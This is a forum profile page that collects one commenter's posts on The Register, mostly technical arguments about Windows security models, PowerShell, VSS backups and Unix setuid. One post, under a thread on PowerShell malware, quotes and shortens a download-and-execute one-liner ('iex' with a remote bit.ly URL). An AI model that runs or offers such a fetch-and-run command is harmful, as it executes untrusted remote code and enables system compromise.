* Posts by Uffe Seerup

88 publicly visible posts • joined 10 Dec 2007


NSA urges orgs to use memory-safe programming languages

Uffe Seerup

Re: Best of all

Vulnerabilities come in classes. One such class is memory corruption vulnerabilities. These are particularly nasty because they can often lead to remote code execution.

Some languages eliminate this class of security bugs completely. Garbage-collected languages (e.g., C#, Java, Ruby) and borrow-checking languages (e.g., Rust) both eliminate memory corruption bugs.

The advice is sound. Given that memory corruption often allows RCE, it makes sense to use a language where memory corruption is simply not a concern.

Devs getting stuck into Windows 10X on Surface Neo will have to tussle with UWP

Uffe Seerup

Re: Some applications will run...

"Win32" is the previous name for what is now called "Windows API". It is *both* a 32bit and 64bit api.

https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list

"Using the Windows API, you can develop applications that run successfully on all versions of Windows while taking advantage of the features and capabilities unique to each version. (Note that this was formerly called the Win32 API. The name Windows API more accurately reflects its roots in 16-bit Windows and its support on 64-bit Windows.)"

Now please correct the article's misleading claims.

There is no reason to believe that Windows containers on a 64-bit Windows OS will only be able to run 32-bit Win32 (Windows API) applications. In fact, given that containers are merely a virtualization of the host OS, it would be *hard* and require extra effort to constrain a container to 32-bit applications.

A 64-bit Windows is able to run 64-bit Win32 (Windows API) applications *and* 32-bit Win32 (Windows API) applications.

There is no such thing as Win64. Some have used Win64 as shorthand for 64-bit Windows. This confusion is why MS has tried to "rename" the API from Win32 to Windows API. With limited success, it seems.

Uffe Seerup

Author conflates Win32 and 32-bit applications

It appears that the author conflates Win32 and 32-bit applications. Win32 is the *name of the API*, not a reference to the bitness of the machine*. The legacy API on Windows x64 is *still* referred to as Win32 - even though it is used by 64-bit applications on a 64-bit OS.

Certainly, Windows containers (yes, that is a thing) are 64-bit on a 64-bit OS, and will run both 64-bit Win32 and 32-bit Win32 applications.

Win64 - which the author mentions - is not a thing.

Admittedly, Microsoft has not helped with their naming scheme. I suspect that the name obfuscation dept. of Microsoft takes up an entire building on their campus.

*) OK, it was once, when MS needed to distinguish the new API in Windows 95 from the old 16-bit API of Windows 3.x.

That magical super material Apple hopes will hit backspace on its keyboard woes? Nylon

Uffe Seerup

Re: Apple keyboard malfunction issues and IFixit.

Strictly speaking it was a CR+LF lever. If you didn't pull it gently, it would add an LF at the end of the CR.

Windows Subsystem for Linux adds pop to release, SAC-T sacked, crypto-jacking apps: It's Microsoft's week

Uffe Seerup

Re: Shouldnt it be LSW, Linux Subsystem for Windows instead

> Shouldnt it be LSW, Linux Subsystem for Windows instead?

No, not really. There is no GNU/Linux in there. The original "core" kernel, which was developed to support multiple operating systems (initially Windows and OS/2) and for a short period served SFU, has now been adapted to "act as" a Linux kernel. The Windows architecture is really advanced in this regard. The core system was created with a flexible process/thread model which allows multiple process/thread paradigms to be accommodated. A Linux thread is not merely a Windows thread emulating a Linux thread; it is a core thread with no Windows in it.

PowerShell comes to MacOS and Linux. Oh and Windows too

Uffe Seerup

Restartable (across system restart) powershell scripts

> I would like to know more. Really need this is some of my scripts.

See this article:

https://blogs.technet.microsoft.com/heyscriptingguy/2013/01/23/powershell-workflows-restarting-the-computer/

When using PowerShell to script "workflows", only a subset of PowerShell cmdlets is supported. IIRC you can create a "script step" if you want to use non-workflow cmdlets.
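A minimal sketch of the pattern from that article (PowerShell 3.0+ workflows; the workflow and job names are illustrative):

workflow Demo-RebootAndResume {
    "Step 1 - runs before the reboot"
    Checkpoint-Workflow            # persist workflow state to disk
    Restart-Computer -Wait         # reboot; the suspended workflow survives it
    "Step 2 - runs after the reboot"
}

# Run it as a job so it can be resumed once the machine is back up
# (the article wires the resume up via a startup scheduled task):
Demo-RebootAndResume -AsJob -JobName RebootDemo
# After the restart: Get-Job -Name RebootDemo | Resume-Job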

Microsoft hits new low: Threatens to axe classic Paint from Windows 10

Uffe Seerup

Re: The end

> I too liked it for manipulating screenshots, until I discovered Snipping Tool buried in the start menu. Why hadn't I run across this before?

Have you ever tried Windows-R, type "psr", Enter?

PSR = Problem Steps Recorder. But what it really does is document a series of user interface steps with multiple screenshots, showing the mouse position and documenting what was clicked.
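psr.exe can also be driven from the command line - the switches below are as I remember them, so check psr.exe /? before relying on them:

# Record up to 25 screenshots into a zip archive:
psr.exe /start /output "$env:TEMP\steps.zip" /sc 1 /maxsc 25
# ...reproduce the steps you want documented, then:
psr.exe /stop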

Penguins force-fed root: Cruel security flaw found in systemd v228

Uffe Seerup

Surprise

Once again, the deliberate hole in the *nix security model - SUID/setuid - is at the core.

Microsoft's HoloLens secret sauce: A 28nm customized 24-core DSP engine built by TSMC

Uffe Seerup

There is an airgap

The design has two "rings" - an inner and an outer ring. The inner ring is lined with soft foam and is adjustable to your head. The outer ring (with a small gap at the back to allow access to the inner ring's tightener) contains the electronics - where the heat will be generated.

It is quite obvious from the images: https://www.microsoft.com/microsoft-hololens/en-us

Windows 10 debuts Blue QR Code of Death – and why malware will love it

Uffe Seerup
FAIL

The Register Fails

> Fake a system crash by popping up a blue screen, show a QR code that links to a malicious website, and fool someone into opening it on their browser.

Two problems with that thinking:

1. How do you fake a system crash without already having control of the computer? No, a browser will not do - you cannot take over the entire screen. For a browser to take over the screen, the user must perform an explicit action, and even then there are clues on the screen that it is but a browser and that you can just hit ESC to return.

2. If it was so easy, why is malware not doing this already? Do you really think average Joe needs to know (or will even know) that Microsoft started using QR codes on BSODs? If Joe is inclined to fall for this, surely there's no reason to wait for Microsoft to start using QR codes?

Microsoft lures top Linux exec from Oracle to Redmond

Uffe Seerup

Re: Microsoft Linux Container OS with NT kernel

> The NT kernel source leaked out years ago. What a barrel of laughs that was, to the people who could look without tainting their own work

Oh, you mean this?

https://www.thetfp.com/tfp/tilted-technology/46375-article-leaked-windows-source-code-print.html

"Despite the above, the quality of the code is generally excellent. Modules are small, and procedures generally fit on a single screen. The commenting is very detailed about intentions, but doesn't fall into "add one to i" redundancy".

Apple's fruitless rootless security broken by code that fits in a tweet

Uffe Seerup

Re: No magic bullet

> and Windows, starting as a single user system, has found it difficult to build security in

The current strain of Windows has nothing to do with the single-user 9x strain. Windows NT was a clean-room re-implementation of Windows, with security and authentication built in from the start in an *extensible* model that was prepared for future enhancements. Windows 2000, XP, Vista, 7, 8 and 10 are all based on the same security model.

And it solves all of your complaints about Unix.

> First, instead of accessing storage on their own user processes should go through a back-end with specific permissions

Windows (and Linux/Unix) already go through a back-end (known as syscalls) when accessing resources. This is an ideal place to enforce security restrictions. Linux allows LSMs to intercept syscalls and perform extra access checks. Windows tokens are far more advanced than the Unix model and have catered for this type of security access check from the start.

However, only Unix/Linux came up with the stupid idea of creating a deliberate hole in the model when they chose to elevate a single user (uid 0) to "god", by creating bypass code in every syscall to just let root through. There is no similar hole in Windows: All users - including administrators - are just users and must pass through the same security checks. Admins are only admins because of the permissions *granted* to the accounts.

> Secondly, introduce a concept of application permissions that sits alongside user permissions

Windows AppContainers (not to be confused with Docker containers) were introduced in Windows 8 - and leverage the same token-based security that has been in Windows since the first Windows NT. When the token contains a special SID, the process is restricted *beyond* what the user can do, i.e. *both* the user *and* the application must have been explicitly granted access to a resource for the process to be able to access it.

https://msdn.microsoft.com/en-us/library/windows/desktop/mt595898(v=vs.85).aspx

> Thirdly, and this is where something like Apple's idea comes in, the kernel would lock root out from changing such storage on its own account; it would need to be authorised by a specific user, such as odf-admin for instance, to de-allocate odf storage.

And that is where the Unix model fails. Big time. This is yet another SUID/setuid fiasco. A security model where you gain *extra* privileges from the executable that you run is a deliberate (but *stupid*) security hole.

What you want is to get rid of the "god" account and use discretionary privileges instead. The user's permissions should be an *upper bound*. If he/she needs to perform an action that requires permissions he/she does not hold, he/she must interact with a service instead. The service can perform authorization checks, but under NO circumstances should the process run within the requesting user's context. This latter part is why vulnerabilities such as Shellshock were so devastating.

Attackers packing malware into PowerShell

Uffe Seerup

Re: So...

> ...it has to get past your email spam defenses,

> then pass the AV defenses,

> then it's in.

Nope. Delivered through a browser or email client, the Word document file will be tainted with the "internet zone". Upon seeing that, Word will by default open the document in protected view mode.

What this means is that the process running Word will be running at low integrity (the same as protected mode in Internet Explorer, and the same as Google Chrome's sandbox on Windows). Macros are disabled in protected view. Even if there were an exploitable memory corruption bug, the Word instance would still be sandboxed.

https://blogs.technet.microsoft.com/office2010/2009/08/13/protected-view-in-office-2010/

Uffe Seerup

Re: The power of PowerShell

> iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")

a bit shorter:

iex (iwr http://bit.ly/e0Mw9w)

awesomeness ensues...
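Spelled out without the aliases (iex = Invoke-Expression, iwr = Invoke-WebRequest, the latter from PowerShell 3.0 onwards):

Invoke-Expression (Invoke-WebRequest http://bit.ly/e0Mw9w)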

Linux fans may be in for disappointment with SQL Server 2016 port

Uffe Seerup

Re: Perfectly understandable (not)

> I wonder how other DB systems like DB/2, Oracle and MySQL have done it so far on Linux without it

In the absence of an operating system feature, they rely on their customers to hire sysadmins who will code bash scripts that shut down DB servers (or "quiesce" them) during the backup operation, reach into VMs using ssh to perform similar functions, all to be maintained by the sysadmin with high job security.

Or the customers will just take the risk and assume that the restore will work and hope that the roll-forward will not take too long.

> SQL Server is so inter-linked to the underlying OS that it actually needs that feature to work properly?

No, you can also just copy SQL Server's database and transaction log files, and it will be restorable, just like Postgres, Oracle etc. However, just like those systems, it will see a restore from such an unsynchronized state as the equivalent of a power failure and start rolling the transaction logs forward from the last checkpoint.

Oracle on Windows also registers itself as a VSS writer - i.e. it will take part in the VSS protocol when a system snapshot or backup occurs. The rest of Windows has a lot of other VSS writers, e.g. DNS, DHCP etc., ensuring that information is synchronized across the board.

But hey - you can get by without it. It just involves some more work and a slightly higher risk.

Uffe Seerup

Re: Perfectly understandable

> It's this "new" technology called taking a snapshot of the VM, and backing up the snapshot through the hypervisor's storage APIs

So, how will an Oracle RDBMS instance inside a VM ensure that it has flushed all "dirty" pages to disk when the snapshot occurs? If it did not ensure the disk state was consistent at the time of the snapshot, it *will* look like a power failure if you ever restore the disk.

You could of course just bring the VM back directly in a running state. That will mess up every single one of its network connections, however. I sure hope this is not your server backup strategy.

> and if the Backup software has any worth, it will issue a quiescent command to the VM's DB application before taking the snapshot.

So, how does your backup software, running on the VM host, reach into the VM guests and discover the DB applications *and any other running application which may need to flush state* in order to issue a quiesce command?

What if the backup software could ask the operating system for a list of "quiesce" targets, and issue a quiesce command upon backup automatically? What if the hypervisor was a quiesce target which - recursively - discovered quiesce targets within the VM guest and issued quiesce commands to those as well?

That would be cool, wouldn't it? That is actually what Windows VSS is. Read here: https://en.wikipedia.org/wiki/Quiesce

That is an *enterprise* feature. By offering it as an operating system service, backup software does *not* need to know about all of the types of DB systems and other services which would need to "quiesce" upon backup. Services do not need to know about backup software.

> It doesn't make much sense to back up a host's drives

Oh? Seems to me that backing up the host system (including all drives) by snapshotting and then dumping the snapshot to external backup storage makes a lot of sense, especially if the backup software is not just disk-oriented but *application*-oriented, i.e. if I could back up the VM host, but upon restore just ask to restore a single VM, and get back just the host files that represent the virtual disks and memory of that VM. Which is what Windows VSS does.

Uffe Seerup

Re: Perfectly understandable

> what 'enterprise-scale features' are you referring to?

One example would be Volume Shadow Copy Service (https://technet.microsoft.com/en-us/library/cc757854(v=ws.10).aspx)

Database systems on Windows (like Oracle and SQL Server) declare themselves as VSS writers. Similarly, backup software (both the built-in and 3rd party) declares itself as a VSS requester.

What this means is that the backup software will notify the VSS service when a system is backed up. The VSS service coordinates safe backup points with the VSS writers. Upon request from the VSS service, the VSS writers will flush in-memory structures to disk, ensuring a restore-consistent image.

Without something like the VSS service, restoring a snapshot of a system will appear to the database system as a power failure. A good RDBMS will overcome this by rolling transaction logs forward - but at the expense of a longer restore process.

With VSS the database system will see the image as consistent - as if the RDBMS had been shut down during the backup - and will *not* require expensive replays of transaction logs.

This is an *enterprise* feature: To be able to do a consistent system backup on a running system.

VSS even integrates with Hyper-V, meaning that if you start a backup process on the *host* - which owns the disks being backed up - the host will signal the VSS protocol through the hypervisor, ensuring that any VSS writers within the virtual machine guests are coordinated with the host system backup.

Consider a virtual machine setup with Linux guests. You back up the host with all of the disks. How do you ensure that the guests are backed up at a consistent point in time? How do you ensure that processes/daemons running in the VM guests flush their memory to disk just when the disks are backed up?
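As a taste of the requester side, you can create a shadow copy yourself from PowerShell via WMI - a minimal sketch, assuming an elevated prompt and an NTFS volume:

# Create a VSS snapshot of the C: volume and show it:
$shadowClass = [wmiclass]"root\cimv2:Win32_ShadowCopy"
$result = $shadowClass.Create("C:\", "ClientAccessible")
Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $result.ShadowID }

Registered VSS writers (SQL Server, Hyper-V, etc.) get the chance to flush before the snapshot is taken - which is the whole point.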

Microsoft releases major PowerShell update after long preview

Uffe Seerup

Re: A shortsighted view

> Want to run the same command on 10 different servers, at the same time?

In PowerShell:

icm (gc hosts.txt) {ps}

This gets a list of processes running on all the computers listed in the hosts.txt file. The command (ps) is executed simultaneously on all hosts and the result is consolidated into a single list of processes, each with a property indicating which remote host it was received from.
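Spelled out without the aliases (icm = Invoke-Command, gc = Get-Content, ps = Get-Process):

Invoke-Command -ComputerName (Get-Content hosts.txt) -ScriptBlock { Get-Process }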

Care to explain how this is a problem?

Mostly Harmless: Google Project Zero man's verdict on Windows 10

Uffe Seerup

> The registry for example is basically a one-stop-shop for everything on the system and has no concept of restricting apps access to their own area.

The registry has access control lists (ACLs) on each key. You absolutely need to have been granted access (read, write, etc.) for each key in the registry - although keys inherit parent ACLs by default, just like in the file system.

This would be akin to each *line* of a config file in *nix having its own ACL. So there absolutely is a way to restrict apps' access. And it is commonly done.
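You can inspect a key's ACL directly from PowerShell through the registry provider:

# Who owns - and who can access - this key?
Get-Acl -Path HKLM:\SOFTWARE\Microsoft | Format-List Owner, AccessToString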

> UAC is less of a security feature and more of a button to absolve MS of any responsibility if the program you're running messes your system.

UAC is a security feature (it helps keep a system secure) but not a security *boundary*. In the same way, because of SUID root, *nix security is also not a security boundary (unless SELinux or similar is applied).

> While it would break compatibility with loads of applications I think MS should look at moving away from the registry

Through support for ACLs, the registry already has full support for app containment. Windows "modern" apps run in app containers, and because the security model (with an extensible token) allowed it, it fits nicely with the existing model.

Temperature of Hell drops a few degrees – Microsoft emits SSH-for-Windows source code

Uffe Seerup

Re: POSIX

> Windows is not a fully OO environment - most of the Win32 API is a C one

Even the original C-based APIs use the concept of *handles* and *object types*. The handles are actually references to objects, and the dynamic virtual method table for an object is created when it is "opened". So yes, the fundamental design philosophy of Windows was always object-oriented, even if the actual implementation has gone through several iterations. The object-orientation is why - even today - the model fits well with PowerShell.

Unlike *nix, object permissions in Windows are established when the object is opened or created. You ask for a set of permissions and - if granted - corresponding methods will be pointed to by the dispatch table of the object. Slots for methods corresponding to permissions you didn't ask for will point to a "denied" method. This has the obvious advantages that 1) Windows does not need to check permissions on each "syscall" - it's encoded in the way the DMT is set up - and 2) handles can be passed to lesser-privileged processes - as they point to the same DMT, they will inherit the permissions.
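The effect is visible even from user mode. A small illustration (the scratch file path is arbitrary):

Set-Content "$env:TEMP\demo.txt" 'hello'
# Ask for Read access only when opening the handle:
$fs = [System.IO.File]::Open("$env:TEMP\demo.txt", 'Open', 'Read')
$fs.WriteByte(65)   # throws - this handle was never granted write access
$fs.Close()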

Microsoft drops rush Internet Explorer fix for remote code exec hole

Uffe Seerup

Re: Pro Tip

> A simple fix for this is to not allow browsers to run under admin accounts by default.

If you do not turn off UAC - you are never running with admin capability by default on Windows. On Windows - unlike Unix - your identity is separated from your privileges.

When you log in using an administrator account, you retain the identity, but all administrative privileges are stripped from the *token* that is created. Security tokens on Windows are infinitely more capable than the naive Unix "effective user" thingy.
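You can see this in the token itself. From a non-elevated console on an administrator account:

# The Administrators group is present but marked "used for deny only":
whoami /groups | findstr /i "Administrators"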

Hold that upgrade: Critical bug in .NET 4.6 'breaks applications'

Uffe Seerup

Re: So What's the Solution?

There's a registry setting that controls whether the new JITter or the old one is to be used. Set the JITter to the classic one until this problem has been fixed.
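As I recall it, the value is a DWORD named useLegacyJit under HKLM\SOFTWARE\Microsoft\.NETFramework - verify against Microsoft's advisory before relying on it:

# Fall back to the legacy (pre-RyuJIT) 64-bit JIT compiler system-wide:
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\.NETFramework' -Name useLegacyJit -Type DWord -Value 1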

Get root on an OS X 10.10 Mac: The exploit is so trivial it fits in a tweet

Uffe Seerup

Re: Congratulations on repeating exploits before they can be fixed

> Congratulations on repeating exploits in detail before they can be fixed by anyone...

When Stefan Esser tweets it, you can consider it in the public domain. At that point, raising awareness can be seen as a service to the public. El Reg does us all a service here.

I agree that security researchers should not just blurt out exploit code. I totally support responsible disclosure. But once it is out there, the bad guys certainly know about it. Telling the good guys about it so that they can prepare for it is a good thing.

Apple has fixed this in a beta of OS X. If they believe that they can silently fix security errors and nobody will know about them until they publish the advisory, then Apple is being *incredibly* naive.

I would venture a guess that Stefan Esser has diff'ed the binaries or diff'ed decompiled binaries for changes between the same utilities in different versions. Any change is potentially a security hole that has been fixed.

This is trivial, especially if you are actively looking for security vulnerabilities. Publishing code with fixed vulnerabilities is even better (from a bad guy's view) than disclosing through an advisory: at that point you have everything needed to create an exploit, while the potential victims are unaware of the threat and thus cannot defend against it.

This one would light up because of the extra checks on the allowed paths. From there it is easy to infer that the current version does something incomplete.

> Yellow journalism.

It doesn't mean what you think it means.

> However, the article does not Emphasise that you must first have privileged access through an app. Double yellow, click bait.

A compromised Firefox or Safari process runs as a local user. This would allow an attacker to go full root on a system from there. But I am sure there is no chance of a vulnerability in Firefox or Safari? Or mail clients? Or SSH?

Are you one of those who also dismiss threats of malware against OS X by referring to how it will ask you for a password before installing anything? Well, with this one there will be no password prompt, but the attacker can install anything.

Uffe Seerup

The real culprit

Is the deliberately holed *nix security model. Once again a SUID/setuid utility strikes.

Because of SUID, the *nix security model is not a security boundary. A security boundary guarantees that every access is checked against an access policy or permission set. By design, the *nix model is that if you are root you bypass all security checks.

It is a deliberate hole, drilled in the model out of necessity, since the model is otherwise not capable of expressing the necessary permissions in modern environments.

This is going to bite again and again, just as it has been responsible for numerous vulnerabilities and exploits in the past.

Microsoft attaches Xbox stream bait to Windows 10 hook

Uffe Seerup

Streaming high-end games rendered on XBox One to laptops and tablets

Or even play multiplayer on separate screens (XBox + Win 10 PC) streamed from the same XBox.

That's why.

Even without a beefy GPU you can stream the game to a laptop or tablet, which incidentally can also connect the XBox controllers.

More here: http://www.xbox.com/en-US/windows-10

OPEN WIDE: Microsoft Live Writer authoring tool going open source

Uffe Seerup

Re: What licence?

> Microsoft have made source code available before, with a license that said something like: "If you could have seen this source code, and you ever make money out of software in future, Microsoft can sue you for copyright infringement.

In the past Microsoft has released some source code under a *shared* source license. Maybe that's what you are thinking of. That is not *open* source, however, and Microsoft has never used the term "open source" to describe the shared source license.

Microsoft has been on a roll lately releasing products as *open* source. Each and every time Microsoft has said *open* source it has been an OSI approved license, usually MIT, Apache or MS-PL. Yes, MS-PL is also OSI approved.

It's 2015 and Microsoft has figured out anything can break Windows

Uffe Seerup

Re: Surely...

"Except they don't. Because - again, like a goddamned broken record - you are counting every security issue in every package of a distro against the core Windows OS, without regard to vulnerability type or severity."

Sorry, Trevor, but you are wrong. Let's take the latest full year (2014), take Windows 8.1 and compare it to *just* the Linux kernel. From there you can add X and Gnome/KDE to get to the same functional level as Windows 8.1. But first, just the kernel:

Linux kernel: http://www.cvedetails.com/vulnerability-list/vendor_id-33/year-2014/Linux.html

Windows 8.1: http://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-26434/year-2014/Microsoft-Windows-8.1.html

Linux kernel, year 2014: 135

Windows 8.1, year 2014: 38

For the year 2015 so far, the numbers are 60/40 in Linux's favor, but keep in mind that it is not a full year and that this counts only KERNEL vulnerabilities for Linux versus ALL vulnerabilities for Windows 8.1.

Let's go back to 2012-2013 then. Windows 8.1 did not have a full year of 2013, so let's compare Windows 7 to Linux (kernel only again) for 2013:

Linux kernel for year 2013: 189 vulns

Windows 7 for year 2013: 100 vulns.

Linux kernel for year 2012: 116 vulns

Windows 7 for year 2012: 44 vulns.

Again, contrary to your claims, this is counting only Linux KERNEL vulns against a fully functional Windows.

So it would appear that you are incorrect, Trevor.

Wrestling with Microsoft's Nano Server preview

Uffe Seerup

Pets or cattle?

> But if it runs on its own hardware, say some kind of appliance, you may need some direct access if the network components don't work for some reason.

The mantra is: you should not manage your servers like pets; you should manage them like cattle. As Snover said: "If one gets ill you do not check it into the animal hospital - you fire up the barbecue". While I personally would not like to eat a sick animal, I totally get the idea when it comes to servers.

If a server becomes unresponsive you nuke it and re-install it using whatever method you used originally (PXE). Your environment based on PowerShell DSC or Chef or Puppet should ensure that the server comes up configured like the rest of the herd. If that fails you discard it.

You have to consider that the target for Nano is not your basement hobby server. It is servers at (huge) datacenter scale *and* single-workload VMs.

When the datacenter is built from containers with hundreds or thousands of servers in each container, you do NOT send in a repairman (veterinarian) when one misbehaves. You disable it and chalk it up to the cost of doing business. When enough servers have failed you may consider refurbishing them.

Your infrastructure should already be resistant to server failures. As soon as a server fails, the workload should shift to other servers, either as part of clustering or hot-standby or super-fast provisioning. Either way, the only reason to try to salvage a server should be HW savings - not to make services available again. If you depend on salvaging a bad server for availability of services, you are doing it wrong.

Which means that you should be in no rush. Whatever was on that server was redundant (in the sense that it is available elsewhere) and you can just re-commission it at a time of your choosing and with no regard to data. I.e. re-install.

Uffe Seerup

The why and what for

Per Microsoft's Jeffrey Snover (chief architect for Windows Server), Nano Server is *primarily* a scratch-your-own-itch refactoring.

The biggest user of Windows Server - by far - is Microsoft Azure. If you can save 25% on the size, you can increase VM density by 33%. If you can save 50% you can double the VM density.

The hard disk footprint has been reduced by a factor of 20. That is a *massive* saving once they scale to Azure.

OS RAM usage is down considerably as well. Fewer features mean fewer patches (both bugfixes and security patches) and consequently fewer reboots. Microsoft investigated how many of the patches in 2014 touched the components in Nano and concluded that 80% of the patches would not have been required, as they concerned components not in Nano.

But to turn the question around: why does a *server* - by definition a machine whose primary task is to run a workload - need to have a *command interpreter*, a *shell* and an *editor*, even very basic ones?

Why should you need to log in to a machine over SSH, start a command interpreter on the server and issue commands? Why would you want a Ruby interpreter? All extra components have to be maintained and add to the attack surface.

Microsoft has come to this realization late, but at least they now go the whole way and may very well take it a bit further.

Ideally the remote server is "just a server" with a standard interface to control and configure it and no way to log in locally. That is what Server Nano is.

Btw, PowerShell has this nice property that it can submit "script blocks". Script blocks are semi-compiled script, so while MS will still need some PowerShell infrastructure on Nano, they could very well cut away the *shell* part of it - leaving only the execution engine. Already today - if you use PowerShell remoting - you can send scripts to the remote that are not just text. They are parsed and turned into a PS script block locally and then sent to the remote PS engine. The upshot is that you can create scripts that refer to *local* script files but execute them remotely. PS will send the parsed script blocks for those files across the wire.
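For example, a script file that exists only on the admin workstation can be executed on the remote box (host and file names are illustrative):

# Parsed locally; only the resulting script block crosses the wire:
Invoke-Command -ComputerName nano01 -FilePath .\Get-Inventory.ps1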

Microsoft points PowerShell at Penguinistas

Uffe Seerup

It is a "platform play"

Yes, it aims at solving some of the same problems as Chef, Puppet et al. But unlike those, PowerShell DSC follows industry standards for datacenter/enterprise management.

That said, PowerShell DSC is not at all comparable to the full-featured Chef/Puppet offerings. Instead (according to Microsoft's Jeffrey Snover - the inventor of PowerShell) Microsoft would like other vendors to build management products on top of the open platform.

Chef and Puppet may be available as open source as well as commercial offerings - but they do not adhere to any published standards, hence you get locked in when you base your datacenter management on one of those products.

DSC builds upon Management Object Format (MOF) files, which can be used to declaratively describe the desired state of a node. MOF is a format standardized by the Distributed Management Task Force (DMTF) (see http://dmtf.org/), along with standards for interacting with nodes.

The open source OMI server for Linux implements the OMI standard of the Open Group. The OMI server takes the MOF files and applies the configuration to the nodes.

It is all open source and based on open industry standards supported by a number of tech companies.

Chef recipes are written in Ruby. By using Ruby in a clever fashion the recipes look almost declarative. But they are still Ruby. Imagine if Chef could use MOF files instead.
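For comparison, a minimal DSC configuration, compiled to a standard MOF and then applied (the node name is illustrative):

Configuration WebServer {
    Node 'server01' {
        WindowsFeature IIS {
            Ensure = 'Present'      # declare the desired state...
            Name   = 'Web-Server'   # ...not the steps to get there
        }
    }
}

WebServer -OutputPath C:\dsc                   # compiles to C:\dsc\server01.mof
Start-DscConfiguration -Path C:\dsc -Wait -Verbose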

Microsoft HoloLens or Hollow Lens? El Reg stares down cyber-specs' code

Uffe Seerup

Re: No Holography In Evidence. It's More Of The Old 'Pepper's Ghost'.

Not so sure about that. Microsoft has not said anything either way, except for mentioning that they've had to develop a "holo chip".

I have quizzed some of my colleagues who were at Build and tried them. Specifically, they said that they focused on objects in the real world, and that the holograms appeared sharp when focusing at that distance.

That, to me, suggests that there's more going on than simply stereoscopic lenses. If they were simply lenses that overlay an image a few centimeters from your eyes, the image would be blurred when you focus your eyes on an object 2 meters away. Try it for yourself: hold a finger in front of your eye and see if you can focus on it at the same time as you look at an object even just 50 cm away (and vice versa).

The limited viewport seems to be a dealbreaker. If they do not solve that it will see very limited usage.

But at this point you have absolutely *nothing* substantiating your claim that it is simply stereoscopic lenses, while there are at least some indications that there's more going on.

Entity Framework goes 'code first' as Microsoft pulls visual design tool

Uffe Seerup

Re: I ran into serious problems with EF

"LINQ supports data types that are queries, using a .NET array type where the variable itself uses lazy evaluation"

No, that is not how LINQ composes queries. LINQ supports IQueryable<T>. An IQueryable can be composed with other queries, more clauses etc. In general, when you compose using IQueryable, the result will also be (should also be) an IQueryable.

"it doesn't retrieve or compute the result until your program actually accesses the value"

(Guessing here) It sounds like you are talking about a *property* with a *getter* which is then evaluated on each reference. If it does not return an IQueryable, it cannot compose lazily with other queries. If it is indeed an "array" type as you describe, that is definitely not the way to do it.

"For example, you can point your GUI to one of these, have it show 10 records from a query, if the query has 50 results it will only retrieve 1-10 until you scroll down. Well, in theory -- EF doesn't support these, it loads the whole enchilada (all 50 records) into RAM and then "lazily" loads values out of that in-memory copy as you use it (it doesn't generate any optimized SQL at all.)"

EF does indeed support paged queries. Use Skip() and Take(): Skip to skip n results, Take to retrieve the next m results - e.g. query.Skip(40).Take(10) fetches rows 41 through 50. I suspect that you may be using some GUI element that does not use this EF feature.

Windows 10 feedback: 'Microsoft, please do a deal with Google to use its browser'

Uffe Seerup

Re: Stop. Just Stop.

> Fully agree. And your justifiable rant reminds me of the question I've been meaning to put to anyone more experienced with the windoze environment than I am.

You are looking for Windows AppLocker: http://technet.microsoft.com/en-us/library/dd759117.aspx

(part of Windows since Windows 7 - before that there were software restriction policies).

With AppLocker you can enforce a policy where executables are only allowed to launch from a few protected folders, such as Program Files and Program Files (x86). Or you can set a policy where only select publishers are whitelisted, e.g. Microsoft, Adobe etc.
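The policy can even be generated from PowerShell - a sketch, with the directory as an example:

# Build publisher/path rules covering everything under Program Files:
Get-AppLockerFileInformation -Directory 'C:\Program Files' -Recurse |
    New-AppLockerPolicy -RuleType Publisher, Path -User Everyone -Xml |
    Out-File .\applocker-policy.xml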

Vanished blog posts? Enterprise gaps? Welcome to Windows 10

Uffe Seerup

> What I don't really like is the requirement of having an online Microsoft account

There is no such requirement. In fact, I tried to set it up on a Surface Pro 3 (mistake) - but because it doesn't come with drivers for the SP3 (no Internet connection during install) I had *only* the local account.

But even if you *do* have a network, the Microsoft account is still optional.

Uffe Seerup

Shutdown is by default a mix between shutdown and hibernate

It is the *kernel* that hibernates. All user programs and user sessions are terminated.

When you shut down, Windows sends shutdown signals to all user processes in all user sessions. The kernel and services in session 0 (including device drivers) are hibernated, i.e. their state is written to disk.

Upon startup, Windows will check that the HW signature of the machine (ntdetect) is still the same, and if so it will read the state from disk rather than go through a full boot process.

If the drivers are up to it, you should not see any effect from this apart from the (much) faster booting.
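If you prefer the old behaviour: the hybrid shutdown rides on the hibernation file, so disabling hibernation from an elevated prompt turns it off as well:

powercfg /hibernate off   # every shutdown becomes a full cold shutdown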

Desktop, schmesktop: Microsoft reveals next WINDOWS SERVER

Uffe Seerup

Re: hate for powershell?

Trevor, you claim that PowerShell is "generally despised as a means of day to day administration".

That's a very unspecific and unverifiable claim. When I come across an admin who uses arcane tools or self-automates through the GUI by manually following "manuals", I always demonstrate to them how they can accomplish the tasks using PowerShell. And the response is generally overwhelmingly positive. So I have the exact opposite experience from you; although like yours it is still anecdotal.

PowerShell *is* the primary tool. Through the module feature it has quickly grown to become the hub of CLI administration on Windows boxes. I dare you to find an area that cannot be administered using PowerShell.

> But for standardised deployments, policy pushes, standardised updates or even bulk migrations any of the proper automation/orchestration tools are just flat out better.

The right tool for the job. On Windows there are still group policies, which remain the most important vehicle for pushing policies. PowerShell is not intended to replace GPOs. PowerShell *can* fill the gaps where group policies cannot reach.

> And for those situation where you're fighting fires, an intuitive GUI is way better, especially for those instances where you're fighting fires on an application you haven't touched in months, or even since it was originally installed.

> This is - to put it mildly - a different role than is served by the CLI in Linux.

If you are "fighting fires" in an application you haven't touched in months and find the GUI better for that, how come you think the Linux CLI is better for that? If your problem is unknown/forgotten instrumentation, *discovery* is what you are after. A GUI can certainly help you there, but I frankly cannot see how a *Linux CLI* would offer more discovery.

In fact, PowerShell offers *much more* in the discovery department than any Linux CLI or scripting language. Granted, you have to be familiar with a few central concepts of PowerShell: modules, the naming convention, Get-Member, Get-Help, Get-Command. However, these are very basic concepts that you are not likely to forget even if you just use PowerShell occasionally.
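The discovery workflow in practice:

Get-Command -Noun Service              # which cmdlets deal with services?
Get-Service | Get-Member               # what do the returned objects expose?
Get-Help Restart-Service -Examples     # how is one of them typically used?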

> The CLI in Linux is much more mature, with a multitude of scripting languages grown around it, and the majority of application configuration done as flat text files, not as XML. (Systemd can die in a fire.)

More mature? How about *old*? Case in point: the arcane bash syntax with its convoluted parser that has placed hundreds of thousands of systems at risk.

